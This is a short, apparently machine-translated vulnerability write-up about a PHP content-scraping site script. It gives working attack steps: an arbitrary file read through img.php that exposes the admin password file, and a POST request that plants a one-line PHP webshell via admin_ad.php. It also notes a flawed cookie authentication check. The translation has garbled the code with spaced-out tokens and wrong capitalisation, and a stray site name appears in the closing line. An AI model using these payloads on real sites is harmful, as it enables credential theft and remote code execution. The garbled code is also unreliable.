If I plan to use the thief program as a website, I will download a set of programs and the results will be tragic.
: Http://www.bkjia.com/ym/201203/31432.html
1. Arbitrary File Reading Vulnerability in the foreground:
Img. php file code
<? Php
$ P = $ _ GET ['P'];
$ Pics = file ($ p );
For ($ I = 0; $ I <count ($ pics); $ I ++)
{
Echo $ pics [$ I];
}
?>
Typical Arbitrary File Reading without any verification
Usage:/img. php? P =./admin/data. php
Read the plaintext of the Administrator account password.
2. Any code written in the background:
Last code snippet of admin_ad.php
<?
} Elseif ($ _ GET ['action'] = "add "){
// Echo $ _ POST ['js _ mb'];
$ File = "../ad/". $ _ POST ['js _ file'];
$ Fp = fopen ($ file, "w ");
Fwrite ($ fp, stripslashes ($ _ POST ['js _ mb']);
Fclose ($ fp );
Echo "<script> alert ('modification successful! '); Location. href = '? Id = ad'; </script> ";
}
?>
Send POST Data
Path:/admin/admin_ad.php? Action = add
POST Data Packet: js_file = x. php & js_mb = <? Php eval ($ _ POST [cmd]);?>
You can generate an x. php one-sentence Trojan password cmd under the website's Active Directory.
This file header is missing in verification:
<?
Include ('data. php ');
If ($ _ COOKIE ['x _ cooker']! = $ Adminname and $ _ COOKIE ['y _ cooker']! = $ Password ){
Echo "<script> location. href = 'index. php'; </script> ";
Exit;
}
?>
If you know the logic error, you can bypass www.2cto.com.